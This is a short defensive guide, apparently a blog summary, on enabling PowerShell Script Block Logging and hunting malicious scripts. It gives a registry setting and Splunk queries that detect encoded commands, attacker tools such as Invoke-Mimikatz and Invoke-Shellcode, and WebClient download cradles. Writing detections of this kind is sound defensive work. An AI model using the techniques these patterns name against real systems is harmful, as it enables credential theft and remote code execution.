5 min read

Hunting for Malicious PowerShell Using Script Block Logging

How to use PowerShell Script Block Logging to detect malicious scripts - configuration, analysis, and detection strategies.

powershell script-block-logging detection hunting windows

Originally published on Medium
Read the full article: Hunting Malicious PowerShell

Script Block Logging

PowerShell Script Block Logging (Event ID 4104) captures the actual code being executed - including deobfuscated content.

Enabling Script Block Logging

Group Policy

Computer Configuration > Administrative Templates > Windows Components > 
Windows PowerShell > Turn on PowerShell Script Block Logging

Registry

Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -Name "EnableScriptBlockLogging" -Value 1

What Gets Logged

  • Full script content
  • Deobfuscated code
  • Function definitions
  • Module imports

Detection Patterns

Encoded Commands

index=windows EventCode=4104 
  ScriptBlockText="*FromBase64String*" OR ScriptBlockText="*-enc*"
| table _time, Computer, ScriptBlockText

Suspicious Keywords

index=windows EventCode=4104 
  ScriptBlockText IN ("*Invoke-Mimikatz*", "*Invoke-Empire*", "*Invoke-Shellcode*")

Download Cradles

index=windows EventCode=4104 
  ScriptBlockText="*Net.WebClient*" ScriptBlockText="*DownloadString*"

Hunting Tips

  • Baseline normal PowerShell usage
  • Alert on rare script blocks
  • Look for obfuscation indicators
  • Correlate with process creation

Read the full guide: Hunting Malicious PowerShell

Related Modules

Active

PowerShell-Hunter

PowerShell tools to help defenders hunt smarter, hunt harder. A collection of scripts, queries, and techniques for threat hunting using PowerShell.

powershell hunting defense triage +2
View Module → GitHub